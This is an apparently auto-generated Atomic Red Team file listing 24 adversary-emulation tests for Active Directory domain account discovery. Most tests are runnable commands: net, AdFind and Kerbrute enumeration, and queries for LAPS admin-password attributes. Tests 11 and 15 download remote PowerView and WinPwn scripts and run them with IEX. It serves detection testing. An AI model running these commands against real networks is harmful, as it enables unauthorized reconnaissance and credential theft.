security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
c7310aa4276f8d1ac64bd3f23eefbfdd6e2e42ff
atomic-red-team/atomics/T1087.002/T1087.002.md
T
Atomic Red Team doc generator 9f6a1eab36 Generated docs from job=generate-docs branch=master [ci skip]
2026-02-18 16:55:45 +00:00

735 lines
28 KiB
Markdown
Raw Blame History

# T1087.002 - Account Discovery: Domain Account
## Description from ATT&CK
> Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.
>
> Commands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code> may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)
[Source](https://attack.mitre.org/techniques/T1087/002)
## Atomic Tests
- [Atomic Test #1: Enumerate all accounts (Domain)](#atomic-test-1-enumerate-all-accounts-domain)
- [Atomic Test #2: Enumerate all accounts via PowerShell (Domain)](#atomic-test-2-enumerate-all-accounts-via-powershell-domain)
- [Atomic Test #3: Enumerate logged on users via CMD (Domain)](#atomic-test-3-enumerate-logged-on-users-via-cmd-domain)
- [Atomic Test #4: Automated AD Recon (ADRecon)](#atomic-test-4-automated-ad-recon-adrecon)
- [Atomic Test #5: Adfind -Listing password policy](#atomic-test-5-adfind--listing-password-policy)
- [Atomic Test #6: Adfind - Enumerate Active Directory Admins](#atomic-test-6-adfind---enumerate-active-directory-admins)
- [Atomic Test #7: Adfind - Enumerate Active Directory User Objects](#atomic-test-7-adfind---enumerate-active-directory-user-objects)
- [Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects](#atomic-test-8-adfind---enumerate-active-directory-exchange-ad-objects)
- [Atomic Test #9: Enumerate Default Domain Admin Details (Domain)](#atomic-test-9-enumerate-default-domain-admin-details-domain)
- [Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation](#atomic-test-10-enumerate-active-directory-for-unconstrained-delegation)
- [Atomic Test #11: Get-DomainUser with PowerView](#atomic-test-11-get-domainuser-with-powerview)
- [Atomic Test #12: Enumerate Active Directory Users with ADSISearcher](#atomic-test-12-enumerate-active-directory-users-with-adsisearcher)
- [Atomic Test #13: Enumerate Linked Policies In ADSISearcher Discovery](#atomic-test-13-enumerate-linked-policies-in-adsisearcher-discovery)
- [Atomic Test #14: Enumerate Root Domain linked policies Discovery](#atomic-test-14-enumerate-root-domain-linked-policies-discovery)
- [Atomic Test #15: WinPwn - generaldomaininfo](#atomic-test-15-winpwn---generaldomaininfo)
- [Atomic Test #16: Kerbrute - userenum](#atomic-test-16-kerbrute---userenum)
- [Atomic Test #17: Wevtutil - Discover NTLM Users Remote](#atomic-test-17-wevtutil---discover-ntlm-users-remote)
- [Atomic Test #18: Suspicious LAPS Attributes Query with Get-ADComputer all properties](#atomic-test-18-suspicious-laps-attributes-query-with-get-adcomputer-all-properties)
- [Atomic Test #19: Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property](#atomic-test-19-suspicious-laps-attributes-query-with-get-adcomputer-ms-mcs-admpwd-property)
- [Atomic Test #20: Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope](#atomic-test-20-suspicious-laps-attributes-query-with-get-adcomputer-all-properties-and-searchscope)
- [Atomic Test #21: Suspicious LAPS Attributes Query with adfind all properties](#atomic-test-21-suspicious-laps-attributes-query-with-adfind-all-properties)
- [Atomic Test #22: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd](#atomic-test-22-suspicious-laps-attributes-query-with-adfind-ms-mcs-admpwd)
- [Atomic Test #23: Active Directory Domain Search](#atomic-test-23-active-directory-domain-search)
- [Atomic Test #24: Account Enumeration with LDAPDomainDump](#atomic-test-24-account-enumeration-with-ldapdomaindump)
### Atomic Test #1: Enumerate all accounts (Domain)
Enumerate all accounts
Upon exection, multiple enumeration commands will be run and their output displayed in the PowerShell session
**Supported Platforms:** Windows
**auto_generated_guid:** `6fbc9e68-5ad7-444a-bd11-8bf3136c477e`
#### Attack Commands: Run with `command_prompt`!
```cmd
net user /domain
net group /domain
```
### Atomic Test #2: Enumerate all accounts via PowerShell (Domain)
Enumerate all accounts via PowerShell. Upon execution, lots of user account and group information will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** `8b8a6449-be98-4f42-afd2-dedddc7453b2`
#### Attack Commands: Run with `powershell`!
```powershell
net user /domain
get-localgroupmember -group Users
get-aduser -filter *
```
### Atomic Test #3: Enumerate logged on users via CMD (Domain)
Enumerate logged on users. Upon exeuction, logged on users will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** `161dcd85-d014-4f5e-900c-d3eaae82a0f7`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of remote system to query | string | %COMPUTERNAME%|
#### Attack Commands: Run with `command_prompt`!
```cmd
query user /SERVER:#{computer_name}
```
### Atomic Test #4: Automated AD Recon (ADRecon)
ADRecon extracts and combines information about an AD environement into a report. Upon execution, an Excel file with all of the data will be generated and its
path will be displayed.
**Supported Platforms:** Windows
**auto_generated_guid:** `95018438-454a-468c-a0fa-59c800149b59`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| adrecon_path | Path of ADRecon.ps1 file | path | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;ADRecon.ps1|
#### Attack Commands: Run with `powershell`!
```powershell
Invoke-Expression "#{adrecon_path}"
```
#### Cleanup Commands
```powershell
Get-ChildItem "PathToAtomicsFolder\..\ExternalPayloads" -Recurse -Force | Where{$_.Name -Match "^ADRecon-Report-"} | Remove-Item -Force -Recurse
```
#### Dependencies: Run with `powershell`!
##### Description: ADRecon must exist on disk at specified location (#{adrecon_path})
###### Check Prereq Commands
```powershell
if (Test-Path "#{adrecon_path}") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/sense-of-security/ADRecon/38e4abae3e26d0fa87281c1d0c65cabd4d3c6ebd/ADRecon.ps1" -OutFile "#{adrecon_path}"
```
### Atomic Test #5: Adfind -Listing password policy
Adfind tool can be used for reconnaissance in an Active directory environment. The example chosen illustrates adfind used to query the local password policy.
reference- http://www.joeware.net/freetools/tools/adfind/, https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx
**Supported Platforms:** Windows
**auto_generated_guid:** `736b4f53-f400-4c22-855d-1a6b5a551600`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
#### Attack Commands: Run with `command_prompt`!
```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -default -s base lockoutduration lockoutthreshold lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength pwdproperties
```
#### Dependencies: Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
###### Check Prereq Commands
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```
### Atomic Test #6: Adfind - Enumerate Active Directory Admins
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Admin accounts
reference- http://www.joeware.net/freetools/tools/adfind/, https://stealthbits.com/blog/fun-with-active-directorys-admincount-attribute/
**Supported Platforms:** Windows
**auto_generated_guid:** `b95fd967-4e62-4109-b48d-265edfd28c3a`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
#### Attack Commands: Run with `command_prompt`!
```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc admincountdmp #{optional_args}
```
#### Dependencies: Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
###### Check Prereq Commands
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```
### Atomic Test #7: Adfind - Enumerate Active Directory User Objects
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory User Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** `e1ec8d20-509a-4b9a-b820-06c9b2da8eb7`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
#### Attack Commands: Run with `command_prompt`!
```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -f (objectcategory=person) #{optional_args}
```
#### Dependencies: Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
###### Check Prereq Commands
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```
### Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects
Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Exchange Objects
reference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html
**Supported Platforms:** Windows
**auto_generated_guid:** `5e2938fb-f919-47b6-8b29-2f6a1f718e99`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
#### Attack Commands: Run with `command_prompt`!
```cmd
"PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" -sc exchaddresses #{optional_args}
```
#### Dependencies: Run with `powershell`!
##### Description: AdFind.exe must exist on disk at specified location (PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe)
###### Check Prereq Commands
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") {exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/bin/AdFind.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe"
```
### Atomic Test #9: Enumerate Default Domain Admin Details (Domain)
This test will enumerate the details of the built-in domain admin account
**Supported Platforms:** Windows
**auto_generated_guid:** `c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef`
#### Attack Commands: Run with `command_prompt`!
```cmd
net user administrator /domain
```
### Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation
Attackers may attempt to query for computer objects with the UserAccountControl property
'TRUSTED_FOR_DELEGATION' (0x80000;524288) set
More Information - https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html#when-the-stars-align-unconstrained-delegation-leads-to-rce
Prerequisite: AD RSAT PowerShell module is needed and it must run under a domain user
**Supported Platforms:** Windows
**auto_generated_guid:** `46f8dbe9-22a5-4770-8513-66119c5be63b`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | Domain FQDN | string | $env:UserDnsDomain|
| uac_prop | UAC Property to search | integer | 524288|
#### Attack Commands: Run with `powershell`!
```powershell
Get-ADObject -LDAPFilter '(UserAccountControl:1.2.840.113556.1.4.803:=#{uac_prop})' -Server #{domain}
```
#### Dependencies: Run with `powershell`!
##### Description: PowerShell ActiveDirectory Module must be installed
###### Check Prereq Commands
```powershell
Try {
Import-Module ActiveDirectory -ErrorAction Stop | Out-Null
exit 0
}
Catch {
exit 1
}
```
###### Get Prereq Commands
```powershell
if((Get-CimInstance -ClassName Win32_OperatingSystem).ProductType -eq 1) {
Add-WindowsCapability -Name (Get-WindowsCapability -Name RSAT.ActiveDirectory.DS* -Online).Name -Online
} else {
Install-WindowsFeature RSAT-AD-PowerShell
}
```
### Atomic Test #11: Get-DomainUser with PowerView
Utilizing PowerView, run Get-DomainUser to identify the domain users. Upon execution, Users within the domain will be listed.
**Supported Platforms:** Windows
**auto_generated_guid:** `93662494-5ed7-4454-a04c-8c8372808ac2`
#### Attack Commands: Run with `powershell`!
```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
```
### Atomic Test #12: Enumerate Active Directory Users with ADSISearcher
The following Atomic test will utilize ADSISearcher to enumerate users within Active Directory.
Upon successful execution a listing of users will output with their paths in AD.
Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
**Supported Platforms:** Windows
**auto_generated_guid:** `02e8be5a-3065-4e54-8cc8-a14d138834d3`
#### Attack Commands: Run with `powershell`!
```powershell
([adsisearcher]"objectcategory=user").FindAll(); ([adsisearcher]"objectcategory=user").FindOne()
```
### Atomic Test #13: Enumerate Linked Policies In ADSISearcher Discovery
The following Atomic test will utilize ADSISearcher to enumerate organizational unit within Active Directory.
Upon successful execution a listing of users will output with their paths in AD.
Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
**Supported Platforms:** Windows
**auto_generated_guid:** `7ab0205a-34e4-4a44-9b04-e1541d1a57be`
#### Attack Commands: Run with `powershell`!
```powershell
(([adsisearcher]'(objectcategory=organizationalunit)').FindAll()).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] OU Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
```
### Atomic Test #14: Enumerate Root Domain linked policies Discovery
The following Atomic test will utilize ADSISearcher to enumerate root domain unit within Active Directory.
Upon successful execution a listing of users will output with their paths in AD.
Reference: https://medium.com/@pentesttas/discover-hidden-gpo-s-on-active-directory-using-ps-adsi-a284b6814c81
**Supported Platforms:** Windows
**auto_generated_guid:** `00c652e2-0750-4ca6-82ff-0204684a6fe4`
#### Attack Commands: Run with `powershell`!
```powershell
(([adsisearcher]'').SearchRooT).Path | %{if(([ADSI]"$_").gPlink){Write-Host "[+] Domain Path:"([ADSI]"$_").Path;$a=((([ADSI]"$_").gplink) -replace "[[;]" -split "]");for($i=0;$i -lt $a.length;$i++){if($a[$i]){Write-Host "Policy Path[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).Path;Write-Host "Policy Name[$i]:"([ADSI]($a[$i]).Substring(0,$a[$i].length-1)).DisplayName} };Write-Output "`n" }}
```
### Atomic Test #15: WinPwn - generaldomaininfo
Gathers general domain information using the generaldomaininfo function of WinPwn
**Supported Platforms:** Windows
**auto_generated_guid:** `ce483c35-c74b-45a7-a670-631d1e69db3d`
#### Attack Commands: Run with `powershell`!
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
generaldomaininfo -noninteractive -consoleoutput
```
### Atomic Test #16: Kerbrute - userenum
Enumerates active directory usernames using the userenum function of Kerbrute
**Supported Platforms:** Windows
**auto_generated_guid:** `f450461c-18d1-4452-9f0d-2c42c3f08624`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| Domain | Domain that is being tested against | string | $env:USERDOMAIN|
| DomainController | Domain Controller that is being tested against | string | $env:UserDnsDomain|
#### Attack Commands: Run with `powershell`!
```powershell
cd "PathToAtomicsFolder\..\ExternalPayloads"
.\kerbrute.exe userenum -d #{Domain} --dc #{DomainController} "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
```
#### Dependencies: Run with `powershell`!
##### Description: kerbrute.exe must exist in PathToAtomicsFolder\..\ExternalPayloads.
###### Check Prereq Commands
```powershell
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"){exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "PathToAtomicsFolder\..\ExternalPayloads\kerbrute.exe"
```
##### Description: username text file must exist in PathToAtomicsFolder\..\ExternalPayloads.
###### Check Prereq Commands
```powershell
if (test-path "PathToAtomicsFolder\..\ExternalPayloads\username.txt"){exit 0} else {exit 1}
```
###### Get Prereq Commands
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction ignore -Force | Out-Null
invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1087.002/src/username.txt?raw=true" -outfile "PathToAtomicsFolder\..\ExternalPayloads\username.txt"
```
### Atomic Test #17: Wevtutil - Discover NTLM Users Remote
This test discovers users who have authenticated against a Domain Controller via NTLM.
This is done remotely via wmic and captures the event code 4776 from the domain controller and stores the ouput in C:\temp. [Reference](https://www.reliaquest.com/blog/socgholish-fakeupdates/)
**Supported Platforms:** Windows
**auto_generated_guid:** `b8a563d4-a836-4993-a74e-0a19b8481bfe`
#### Attack Commands: Run with `powershell`!
```powershell
$target = $env:LOGONSERVER
$target = $target.Trim("\\")
$IpAddress = [System.Net.Dns]::GetHostAddresses($target) | select IPAddressToString -ExpandProperty IPAddressToString
wmic.exe /node:$IpAddress process call create 'wevtutil epl Security C:\\ntlmusers.evtx /q:\"Event[System[(EventID=4776)]]"'
```
#### Cleanup Commands
```powershell
Remove-Item -Path \\$IpAddress\c$\ntlmusers.evtx
```
### Atomic Test #18: Suspicious LAPS Attributes Query with Get-ADComputer all properties
This test executes LDAP query using powershell command Get-ADComputer and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
**Supported Platforms:** Windows
**auto_generated_guid:** `394012d9-2164-4d4f-b9e5-acf30ba933fe`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| hostname | Name of the host | string | $env:computername|
#### Attack Commands: Run with `powershell`!
```powershell
Get-ADComputer #{hostname} -Properties *
```
### Atomic Test #19: Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property
This test executes LDAP query using powershell command Get-ADComputer and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
**Supported Platforms:** Windows
**auto_generated_guid:** `6e85bdf9-7bc4-4259-ac0f-f0cb39964443`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| hostname | Name of the host | string | $env:computername|
#### Attack Commands: Run with `powershell`!
```powershell
Get-ADComputer #{hostname} -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
```
### Atomic Test #20: Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope
This test executes LDAP query using powershell command Get-ADComputer with SearchScope as subtree and lists all the properties including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
**Supported Platforms:** Windows
**auto_generated_guid:** `ffbcfd62-15d6-4989-a21a-80bfc8e58bb5`
#### Attack Commands: Run with `powershell`!
```powershell
Get-adcomputer -SearchScope subtree -filter "name -like '*'" -Properties *
```
### Atomic Test #21: Suspicious LAPS Attributes Query with adfind all properties
This test executes LDAP query using adfind command and lists all the attributes including Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
**Supported Platforms:** Windows
**auto_generated_guid:** `abf00f6c-9983-4d9a-afbc-6b1c6c6448e1`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
| domain | Domain of the host | string | $env:USERDOMAIN|
#### Attack Commands: Run with `powershell`!
```powershell
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" *
```
### Atomic Test #22: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd
This test executes LDAP query using adfind command and lists Microsoft LAPS attributes ms-mcs-AdmPwd and ms-mcs-AdmPwdExpirationTime
**Supported Platforms:** Windows
**auto_generated_guid:** `51a98f96-0269-4e09-a10f-e307779a8b05`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| optional_args | Allows defining arguments to add to the adfind command to tailor it to the specific needs of the environment. Use "-arg" notation to add arguments separated by spaces. | string | |
| domain | Domain of the host | string | $env:USERDOMAIN|
#### Attack Commands: Run with `powershell`!
```powershell
& "PathToAtomicsFolder\..\ExternalPayloads\AdFind.exe" #{optional_args} -h #{domain} -s subtree -f "objectclass=computer" ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime
```
### Atomic Test #23: Active Directory Domain Search
Output information from LDAPSearch. LDAP Password is the admin-user password on Active Directory
**Supported Platforms:** Linux
**auto_generated_guid:** `096b6d2a-b63f-4100-8fa0-525da4cd25ca`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| domain | The domain to be tested | string | example|
| top_level_domain | The top level domain (.com, .test, .remote, etc... following domain, minus the .) | string | test|
| user | username@domain of a user within the ad database | string | user@example.test|
| password | password of the user with admin privileges referenced in admin_user | string | s3CurePssw0rD!|
#### Attack Commands: Run with `sh`!
```sh
ldapsearch -H ldap://#{domain}.#{top_level_domain}:389 -x -D #{user} -w #{password} -b "CN=Users,DC=#{domain},DC=#{top_level_domain}" -s sub -a always -z 1000 dn
```
#### Dependencies: Run with `sh`!
##### Description: Packages sssd-ad sssd-tools realmd adcli installed and realm available, ldapsearch
###### Check Prereq Commands
```sh
which ldapsearch
```
###### Get Prereq Commands
```sh
echo ldapsearch not found
```
### Atomic Test #24: Account Enumeration with LDAPDomainDump
This test uses LDAPDomainDump to perform account enumeration on a domain.
[Reference](https://securityonline.info/ldapdomaindump-active-directory-information-dumper-via-ldap/)
**Supported Platforms:** Linux
**auto_generated_guid:** `a54d497e-8dbe-4558-9895-44944baa395f`
#### Inputs
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| username | Username and domain to authenticate with | string | domain&#92;user|
| target_ip | IP to connect to | string | 127.0.0.1|
| password | Password to authenticate with | string | password|
#### Attack Commands: Run with `sh`!
```sh
ldapdomaindump -u #{username} -p #{password} #{target_ip} -o /tmp/T1087
```
#### Cleanup Commands
```sh
rm -rf /tmp/T1087/ 2>/dev/null
```
#### Dependencies: Run with `sh`!
##### Description: Python3 must be installed
###### Check Prereq Commands
```sh
if [ -x "$(command -v python3 --version)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
```sh
sudo apt-get -y install python3
```
##### Description: Pip must be installed
###### Check Prereq Commands
```sh
if [ -x "$(command -v pip --version)" ]; then exit 0; else exit 1; fi;
```
###### Get Prereq Commands
```sh
wget -O /tmp/get-pip.py https://bootstrap.pypa.io/pip/3.6/get-pip.py
python3 /tmp/get-pip.py
```
##### Description: The ldapdomaindump module must be installed
###### Check Prereq Commands
```sh
python3 -c 'import ldapdomaindump' 2>/dev/null
```
###### Get Prereq Commands
```sh
pip install ldapdomaindump
```
##### Description: The future module must be installed
###### Check Prereq Commands
```sh
python3 -c 'import future' 2>/dev/null
```
###### Get Prereq Commands
```sh
pip install future
```
Reference in New Issue View Git Blame Copy Permalink